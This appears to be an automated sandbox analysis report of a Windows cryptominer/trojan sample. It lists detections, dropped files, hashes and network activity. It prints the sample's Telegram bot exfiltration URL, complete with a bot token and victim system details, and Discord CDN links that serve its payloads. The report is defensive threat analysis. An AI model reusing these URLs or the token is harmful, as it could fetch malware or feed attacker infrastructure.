      behaviorgraph top1 signatures2 2 Behavior Graph ID: 664558 Sample: bQQHP9ciRL Startdate: 15/07/2022 Architecture: WINDOWS Score: 100 91 Malicious sample detected (through community Yara rule) 2->91 93 Multi AV Scanner detection for dropped file 2->93 95 Multi AV Scanner detection for submitted file 2->95 97 4 other signatures 2->97 11 bQQHP9ciRL.exe 41 2->11         started        16 System.exe 19 2->16         started        process3 dnsIp4 81 api.telegram.org 149.154.167.220, 443, 49754, 49771 TELEGRAMRU United Kingdom 11->81 83 cdn.discordapp.com 162.159.129.233, 443, 49755, 49762 CLOUDFLARENETUS United States 11->83 89 2 other IPs or domains 11->89 73 C:\ProgramData\UpSys.exe, PE32+ 11->73 dropped 75 C:\ProgramData\Systemd\old.exe (copy), PE32+ 11->75 dropped 77 C:\ProgramData\Systemd\mvsc32.exe, PE32+ 11->77 dropped 79 3 other files (2 malicious) 11->79 dropped 107 May check the online IP address of the machine 11->107 109 Modifies the windows firewall 11->109 111 Adds a directory exclusion to Windows Defender 11->111 18 mvsc32.exe 11->18         started        21 powershell.exe 30 11->21         started        23 WerFault.exe 11->23         started        32 14 other processes 11->32 85 192.168.2.1 unknown unknown 16->85 87 api.ipify.org 16->87 113 Multi AV Scanner detection for dropped file 16->113 115 Machine Learning detection for dropped file 16->115 117 Tries to detect virtualization through RDTSC time measurements 16->117 26 powershell.exe 16->26         started        28 cmd.exe 16->28         started        30 cmd.exe 16->30         started        34 3 other processes 16->34 file5 signatures6 process7 file8 99 Antivirus detection for dropped file 18->99 101 Multi AV Scanner detection for dropped file 18->101 103 Machine Learning detection for dropped file 18->103 105 Uses netsh to modify the Windows network and firewall settings 21->105 36 UpSys.exe 21->36         started        38 conhost.exe 21->38         started        40 netsh.exe 21->40         started        71 C:\ProgramData\Microsoft\...\Report.wer, Little-endian 23->71 dropped 42 UpSys.exe 26->42         started        48 2 other processes 26->48 50 2 other processes 28->50 44 conhost.exe 30->44         started        46 conhost.exe 32->46         started        52 17 other processes 32->52 signatures9 process10 process11 54 UpSys.exe 36->54         started        56 UpSys.exe 42->56         started        process12 58 UpSys.exe 54->58         started        60 UpSys.exe 56->60         started        process13 62 powershell.exe 58->62         started        65 powershell.exe 60->65         started        signatures14 119 Creates files in the system32 config directory 62->119 67 conhost.exe 62->67         started        69 conhost.exe 65->69         started        process15

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      bQQHP9ciRL.exe21%VirustotalBrowse
      bQQHP9ciRL.exe26%MetadefenderBrowse
      bQQHP9ciRL.exe58%ReversingLabsWin64.Adware.RedCap
      bQQHP9ciRL.exe100%Joe Sandbox ML

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\ProgramData\Systemd\mvsc32.exe100%AviraHEUR/AGEN.1203240
      C:\ProgramData\MicrosoftNetwork\System.exe100%Joe Sandbox ML
      C:\ProgramData\Systemd\mvsc32.exe100%Joe Sandbox ML
      C:\ProgramData\MicrosoftNetwork\System.exe21%VirustotalBrowse
      C:\ProgramData\MicrosoftNetwork\System.exe26%MetadefenderBrowse
      C:\ProgramData\MicrosoftNetwork\System.exe58%ReversingLabsWin64.Adware.RedCap
      C:\ProgramData\Systemd\mvsc32.exe71%VirustotalBrowse
      C:\ProgramData\Systemd\mvsc32.exe31%MetadefenderBrowse
      C:\ProgramData\Systemd\mvsc32.exe69%ReversingLabsWin64.Trojan.Miner
      C:\ProgramData\Systemd\old.exe (copy)71%VirustotalBrowse
      C:\ProgramData\Systemd\old.exe (copy)31%MetadefenderBrowse
      C:\ProgramData\Systemd\old.exe (copy)69%ReversingLabsWin64.Trojan.Miner
      C:\ProgramData\UpSys.exe5%VirustotalBrowse
      C:\ProgramData\UpSys.exe0%MetadefenderBrowse
      C:\ProgramData\UpSys.exe4%ReversingLabs
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\UpSys[1].exe0%MetadefenderBrowse
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\UpSys[1].exe4%ReversingLabs

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
      http://microsoft.co0%URL Reputationsafe
      https://contoso.com/License0%URL Reputationsafe
      https://contoso.com/Icon0%URL Reputationsafe
      http://crl.osofts/Microt00%URL Reputationsafe
      http://schemas.micr0%URL Reputationsafe
      http://crl.microsof0%URL Reputationsafe
      https://contoso.com/0%URL Reputationsafe
      http://crl.v0%URL Reputationsafe
      http://crl.micros0%URL Reputationsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      api.ipify.org.herokudns.com
      		3.220.57.224
      		truefalse
        		high
        cdn.discordapp.com
        		162.159.129.233
        		truefalse
          		high
          api.telegram.org
          		149.154.167.220
          		truefalse
            		high
            api.ipify.org
            		unknown
            		unknownfalse
              		high

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              https://api.ipify.org/false
                		high
                https://api.telegram.org/bot5468819057:AAHRJabfvGnrMiNkuZj9RaE8-OjfRBxOw-4/sendMessage?chat_id=486764648&text=New%20User:%20287400%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20%0AIP:%2084.17.52.14false
                  		high
                  https://cdn.discordapp.com/attachments/871345933034606592/995414388804685824/UpSys.exefalse
                    		high
                    https://cdn.discordapp.com/attachments/871345933034606592/995412381125574716/CPU.zipfalse
                      		high

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.649626283.0000021628393000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.532099856.0000021618538000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://api.telegram.org/botbQQHP9ciRL.exe, 00000000.00000000.505690459.0000000140049000.00000002.00000001.01000000.00000003.sdmpfalse
                          		high
                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.532099856.0000021618538000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://microsoft.cobQQHP9ciRL.exe, 00000000.00000003.384461365.0000000000708000.00000004.00000020.00020000.00000000.sdmp, bQQHP9ciRL.exe, 00000000.00000003.384526757.0000000000722000.00000004.00000020.00020000.00000000.sdmp, bQQHP9ciRL.exe, 00000000.00000000.501209281.0000000000708000.00000004.00000020.00020000.00000000.sdmp, bQQHP9ciRL.exe, 00000000.00000003.384221745.0000000000708000.00000004.00000020.00020000.00000000.sdmp, bQQHP9ciRL.exe, 00000000.00000003.385654985.0000000000708000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://cdn.discordapp.com/attachments/871345933034606592/995412380618067998/GPU6.ziphttps://cdn.disbQQHP9ciRL.exe, 00000000.00000000.505690459.0000000140049000.00000002.00000001.01000000.00000003.sdmpfalse
                              		high
                              https://contoso.com/Licensepowershell.exe, 00000002.00000002.649626283.0000021628393000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://api.ipify.org/rootbQQHP9ciRL.exe, 00000000.00000000.505690459.0000000140049000.00000002.00000001.01000000.00000003.sdmpfalse
                                		high
                                https://contoso.com/Iconpowershell.exe, 00000002.00000002.649626283.0000021628393000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://api.ipify.org/5bQQHP9ciRL.exe, 00000000.00000000.498170139.000000000063B000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://cdn.discordapp.com/bQQHP9ciRL.exe, 00000000.00000002.585020543.00000000034A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://crl.osofts/Microt0powershell.exe, 00000002.00000003.512686825.0000021630D16000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000003.508921208.0000021630D16000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://schemas.micrpowershell.exe, 00000002.00000002.672571801.0000021630BF7000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.winimage.com/zLibDll1.2.11.z%02dHbQQHP9ciRL.exe, 00000000.00000000.505690459.0000000140049000.00000002.00000001.01000000.00000003.sdmpfalse
                                      		high
                                      https://api.telegram.org/bot5468819057:AAHRJabfvGnrMiNkuZj9RaE8-OjfRBxOw-4/sendMessage?chat_id=48676bQQHP9ciRL.exe, 00000000.00000003.385519392.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, bQQHP9ciRL.exe, 00000000.00000003.385654985.0000000000708000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.532099856.0000021618538000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://api.ipify.org/-bQQHP9ciRL.exe, 00000000.00000000.498170139.000000000063B000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://cdn.discordapp.com/attachments/871345933034606592/995412381125574716/CPU.zipSSC:bQQHP9ciRL.exe, 00000000.00000000.498170139.000000000063B000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://api.telegram.org/bot%0AbQQHP9ciRL.exe, 00000000.00000000.505690459.0000000140049000.00000002.00000001.01000000.00000003.sdmpfalse
                                                		high
                                                https://cdn.discordapp.com/attachments/871345933034606592/995412381125574716/CPU.zipC:bQQHP9ciRL.exe, 00000000.00000003.458449947.0000000003516000.00000004.00000020.00020000.00000000.sdmp, bQQHP9ciRL.exe, 00000000.00000003.464143211.0000000003516000.00000004.00000020.00020000.00000000.sdmp, bQQHP9ciRL.exe, 00000000.00000003.462604278.0000000003507000.00000004.00000020.00020000.00000000.sdmp, bQQHP9ciRL.exe, 00000000.00000003.458470943.000000000351B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://crl.microsofpowershell.exe, 00000002.00000003.476790520.0000021630CBD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000003.512312940.0000021630CBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://api.telegram.org/bQQHP9ciRL.exe, 00000000.00000000.501209281.0000000000708000.00000004.00000020.00020000.00000000.sdmp, bQQHP9ciRL.exe, 00000000.00000003.385654985.0000000000708000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://cdn.discordapp.com/attachments/871345933034606592/995412381125574716/CPU.zipLbQQHP9ciRL.exe, 00000000.00000000.519257216.00000000034BC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://contoso.com/powershell.exe, 00000002.00000002.649626283.0000021628393000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.649626283.0000021628393000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.winimage.com/zLibDllbQQHP9ciRL.exe, 00000000.00000000.505690459.0000000140049000.00000002.00000001.01000000.00000003.sdmpfalse
                                                          		high
                                                          https://cdn.discordapp.com/attachments/871345933034606592/995412381125574716/CPU.zip-C:bQQHP9ciRL.exe, 00000000.00000000.501652483.000000000072F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://cdn.discordapp.com/attachments/871345933034606592/995412381125574716/CPU.zip$bQQHP9ciRL.exe, 00000000.00000000.519257216.00000000034BC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://cdn.discordapp.com/attachments/871345933034606592/995412381125574716/CPU.zipebQQHP9ciRL.exe, 00000000.00000000.519257216.00000000034BC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.523355586.0000021618331000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://crl.vbQQHP9ciRL.exe, 00000000.00000002.583126829.00000000006D0000.00000004.00000020.00020000.00000000.sdmp, bQQHP9ciRL.exe, 00000000.00000003.384351602.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, bQQHP9ciRL.exe, 00000000.00000003.385519392.00000000006D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://crl.microsbQQHP9ciRL.exe, 00000000.00000003.384461365.0000000000708000.00000004.00000020.00020000.00000000.sdmp, bQQHP9ciRL.exe, 00000000.00000003.384526757.0000000000722000.00000004.00000020.00020000.00000000.sdmp, bQQHP9ciRL.exe, 00000000.00000003.384221745.0000000000708000.00000004.00000020.00020000.00000000.sdmp, bQQHP9ciRL.exe, 00000000.00000003.385654985.0000000000708000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown

                                                                  World Map of Contacted IPs

                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs

                                                                  Public IPs

                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  149.154.167.220
                                                                  		api.telegram.orgUnited Kingdom
                                                                  		62041TELEGRAMRUfalse
                                                                  162.159.129.233
                                                                  		cdn.discordapp.comUnited States
                                                                  		13335CLOUDFLARENETUSfalse
                                                                  3.220.57.224
                                                                  		api.ipify.org.herokudns.comUnited States
                                                                  		14618AMAZON-AESUSfalse

                                                                  Private

                                                                  IP
                                                                  192.168.2.1

                                                                  General Information

                                                                  Joe Sandbox Version:35.0.0 Citrine
                                                                  Analysis ID:664558
                                                                  Start date and time: 15/07/202203:56:552022-07-15 03:56:55 +02:00
                                                                  Joe Sandbox Product:CloudBasic
                                                                  Overall analysis duration:0h 14m 9s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Sample file name:bQQHP9ciRL (renamed file extension from none to exe)
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                  Number of analysed new started processes analysed:74
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • HDC enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.evad.mine.winEXE@117/47@5/4
                                                                  EGA Information:Failed
                                                                  HDC Information:
                                                                  • Successful, ratio: 100% (good quality ratio 33.3%)
                                                                  • Quality average: 14.3%
                                                                  • Quality standard deviation: 20.3%
                                                                  HCA Information:Failed
                                                                  Cookbook Comments:
                                                                  • Adjust boot time
                                                                  • Enable AMSI

                                                                  Warnings

                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, TrustedInstaller.exe
                                                                  • Excluded IPs from analysis (whitelisted): 23.211.6.115, 20.189.173.22, 20.189.173.20, 80.67.82.235, 80.67.82.211
                                                                  • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, onedsblobprdwus17.westus.cloudapp.azure.com, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, login.live.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net
                                                                  • Execution Graph export aborted for target bQQHP9ciRL.exe, PID 7004 because there are no executed function
                                                                  • Execution Graph export aborted for target mvsc32.exe, PID 5108 because there are no executed function
                                                                  • Execution Graph export aborted for target powershell.exe, PID 7124 because it is empty
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                                                  Simulations

                                                                  Behavior and APIs

                                                                  TimeTypeDescription
                                                                  03:58:24AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exe.lnk
                                                                  03:58:28API Interceptor138x Sleep call for process: powershell.exe modified
                                                                  03:58:34API Interceptor7x Sleep call for process: bQQHP9ciRL.exe modified
                                                                  03:58:51API Interceptor1x Sleep call for process: System.exe modified
                                                                  03:59:30API Interceptor2x Sleep call for process: WerFault.exe modified
                                                                  04:00:13AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\20220715

                                                                  Joe Sandbox View / Context

                                                                  IPs

                                                                  No context

                                                                  Domains

                                                                  No context

                                                                  ASNs

                                                                  No context

                                                                  JA3 Fingerprints

                                                                  No context

                                                                  Dropped Files

                                                                  No context

                                                                  Created / dropped Files

                                                                  C:\ProgramData\MicrosoftNetwork\System.exe

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\bQQHP9ciRL.exe
                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):3574272
                                                                  Entropy (8bit):7.781346485304652
                                                                  Encrypted:false
                                                                  SSDEEP:98304:L2CgTecDhJLSeX4VDgtLEycahCF/sFQTxEgzuNwKT4mxM/:oqcDvX4KoxZsFQTxdywtmxM
                                                                  MD5:F56E50F8EE4DFB577CBB3F53F42ED20C
                                                                  SHA1:F5BEDA1A8599B043483BC21DB2F1EA80795246C7
                                                                  SHA-256:786CFE1759666FB139DCEE757637E7C0D92586CAAF6020EB60B455D7BD2251E8
                                                                  SHA-512:6ECA83F4361DF6527347518E30475B8EDEB171D6B4F79862EA7C0937823CFD2A67A1E5C1F86EDA6B65FAFCBB88199911C9CBCD4C60A7406C1C2786CEFCC67496
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: Virustotal, Detection: 21%, Browse
                                                                  • Antivirus: Metadefender, Detection: 26%, Browse
                                                                  • Antivirus: ReversingLabs, Detection: 58%
                                                                  Reputation:unknown
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......b..........#......~...x........ ........@..............................T........... .................................................`.!.......T.....0:T.L>...................................................8T.8............................................text....}.......................... ..`.rdata..............................@..@.data...............................@....pdata..D:..........................@..@_RDATA..............................@..@.[UG9j..0........................... ..`.:&C@J..............................@....gPNi ..|x6......z6.................`..h.rsrc.........T.......6.............@..@........................................................................................................................................................................................................................................................

                                                                  C:\ProgramData\MicrosoftNetwork\System.exe:Zone.Identifier

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\bQQHP9ciRL.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):26
                                                                  Entropy (8bit):3.95006375643621
                                                                  Encrypted:false
                                                                  SSDEEP:3:ggPYV:rPYV
                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                  Malicious:true
                                                                  Reputation:unknown
                                                                  Preview:[ZoneTransfer]....ZoneId=0

                                                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_System.exe_9f3694d951e91cfb4c10f2a1b5c5e63354a2d74_b3ca8767_1a1100e7\Report.wer

                                                                  Download File
                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                  File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):65536
                                                                  Entropy (8bit):1.0839075637196145
                                                                  Encrypted:false
                                                                  SSDEEP:96:pPFxWfGt3oYfIYInhzIl7G8SKpXIQcQ4c6KcEscw3E+p+HbHg/8BRTf3uF0GWAfq:xj8RHoHWOWsjCjKrKz/u7sfS274lt0
                                                                  MD5:E6EF1CFDCB0CC3F83E8C3F9A24D2EEEA
                                                                  SHA1:791114A5061ADAFFCF64A9B288E804FDE1AC8978
                                                                  SHA-256:9A9D1A0469A38589BDF46D20864D4E192FABDA758DF395850EB1670E5678ED39
                                                                  SHA-512:F309C8BCB60A905FBC9B00796836A20CDD2FA2A3546989DE16115138839F5277A9BB5FA06DE60660E37A578E8F5FEA69E67A02D31DDC028777D5F757D4D25212
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.2.3.5.6.3.6.0.3.8.3.5.7.6.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.0.2.3.5.6.3.6.8.6.9.6.0.4.6.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.a.a.e.8.4.9.e.-.4.c.8.6.-.4.4.a.0.-.8.c.8.a.-.8.c.8.0.a.3.3.0.4.3.4.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.f.3.f.4.5.6.5.-.4.1.4.e.-.4.f.9.7.-.8.6.1.c.-.e.a.f.2.8.c.7.f.2.9.0.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.S.y.s.t.e.m...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.7.c.-.0.0.0.1.-.0.0.1.8.-.8.3.e.7.-.1.b.d.5.3.9.9.8.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.S.y.s.t.e.m...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.7././.0.9.:.1.9.:.4.1.:.3.8.!.0.

                                                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_bQQHP9ciRL.exe_7a867a7e3ff969740b2cf432a3a40c38f4f1a4c_14619ec6_1911243e\Report.wer

                                                                  Download File
                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                  File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):65536
                                                                  Entropy (8bit):1.1037844104172572
                                                                  Encrypted:false
                                                                  SSDEEP:192:k8p4ESXHXa0dyf8jCjD8m/u7sfS274ltoY:Vp4L3X3dyf8jBm/u7sfX4ltoY
                                                                  MD5:18757089F0F9B3ED59EF5AE8356D537A
                                                                  SHA1:89D13E6CF9289CF73E9FCAC4D59D344CA81146A0
                                                                  SHA-256:0250C48AFA5F5BDF59AEE1AC978BF10F7188649F80367FC47975E766FF92A50D
                                                                  SHA-512:42794DECD72CC9678C07288CAE028B7DA4EFBCCEC00D4783AE0043003D80A5133D9804CC2626D98E8163CDCF355DE9916D866950EF47223ADD78BFC365BC7B05
                                                                  Malicious:true
                                                                  Reputation:unknown
                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.2.3.5.6.3.6.7.0.9.2.5.9.3.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.0.2.3.5.6.3.7.7.4.4.4.1.3.9.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.1.0.3.1.1.1.0.-.b.6.b.c.-.4.5.d.f.-.9.c.4.1.-.5.1.d.9.5.4.e.5.6.d.9.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.e.e.7.e.9.a.8.-.0.0.e.8.-.4.3.0.a.-.8.f.7.b.-.c.4.6.d.d.c.7.1.2.4.2.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.b.Q.Q.H.P.9.c.i.R.L...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.5.c.-.0.0.0.1.-.0.0.1.8.-.9.3.5.2.-.a.8.c.4.3.9.9.8.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.c.2.8.8.f.3.c.2.4.f.2.e.7.9.8.c.2.d.b.e.f.7.3.d.c.7.8.c.0.c.3.0.0.0.0.f.f.f.f.!.0.0.0.0.f.5.b.e.d.a.1.a.8.5.9.9.b.0.4.3.4.8.3.b.c.2.1.d.b.2.f.1.e.a.8.0.7.9.5.2.4.6.c.7.!.b.Q.Q.H.P.9.c.i.R.L...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.7././.0.9.:.1.9.

                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER638E.tmp.dmp

                                                                  Download File
                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                  File Type:Mini DuMP crash report, 15 streams, Fri Jul 15 10:59:22 2022, 0x1205a4 type
                                                                  Category:dropped
                                                                  Size (bytes):210516
                                                                  Entropy (8bit):1.5184125151968988
                                                                  Encrypted:false
                                                                  SSDEEP:384:75tAGUNHwsYTn7CxjueG8qFgcWWCXsCj7eW3DyqFShTK6dIh9AN+SVq:75tmQnn7CFSFgcKX7aLKh9bSVq
                                                                  MD5:577B48C4CCD6BAE4AB1295EF6A744F64
                                                                  SHA1:EF1B3B8571BC1F12228FDD63A465213B110DCCE8
                                                                  SHA-256:DD3FB9C07B92C6C5C4F842BB24931B291A8C705E3410EA4DE63E31461CD6F0C9
                                                                  SHA-512:C369EF34B1C85CD45CFADC4322D68286AF7C8E1B78429D738AF3DDD9E883C33813E1D8C05C4410B296312675D8DE45E7BA415F05EA45E4B91FC3CC54B1469A57
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:MDMP....... ........H.b....................................$...D'......d....z..........`.......8...........T...........0S..$...........h'..........T)...................................................................U...........B.......)......Lw.................)*...T.......|...\H.b.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER7784.tmp.WERInternalMetadata.xml

                                                                  Download File
                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                  File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):8812
                                                                  Entropy (8bit):3.6968787903531317
                                                                  Encrypted:false
                                                                  SSDEEP:192:Rrl7r3GLNiZ2I+k6YfjnsDgmfDSokCpDc89bZkhfY9Yzm:RrlsNiIfk6YrnsDgmfDSIZCfgR
                                                                  MD5:B1E7CDBADF3193A91C616B3BD38C89CF
                                                                  SHA1:DD9EAE0A120DC930A7F3A934EA3B06A3E1C959F0
                                                                  SHA-256:37DBCE24A86FF769E310879C3FAEE30C114A59F28FAEE454731E2287B6E95E2C
                                                                  SHA-512:A84BECE614A63A05A9026CA18F72F314DD100F8F5D2715E91D5AED2E49FA58D4440CE9ED8103757A0199AB8C0EC5DC7EEDAC1595FFBC7292D88D3C05979DE9D8
                                                                  Malicious:false
                                                                  Reputation:unknown
